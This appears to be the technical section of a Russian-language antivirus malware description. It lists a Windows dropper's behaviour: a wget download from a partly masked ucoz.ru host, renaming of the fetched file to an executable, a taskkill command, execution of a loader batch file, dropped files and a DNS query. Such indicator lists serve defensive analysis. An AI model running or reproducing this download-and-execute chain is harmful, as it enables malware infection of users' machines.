Техническая информация
- '%WINDIR%\r.exe'
- '%WINDIR%\wget.exe' http://re#####ystem.ucoz.ru/r.rr
- '%WINDIR%\r.exe' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /F /IM cmdow.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\loader.bat" "
- %PROGRAM_FILES%\Company\NewProduct\Uninstall.exe
- %PROGRAM_FILES%\Company\NewProduct\Uninstall.ini
- %WINDIR%\r.rr
- %WINDIR%\loader.bat
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\wget.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\r.rr в %WINDIR%\r.exe
- 're#####ystem.ucoz.ru':80
- re#####ystem.ucoz.ru/r.rr
- DNS ASK re#####ystem.ucoz.ru
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'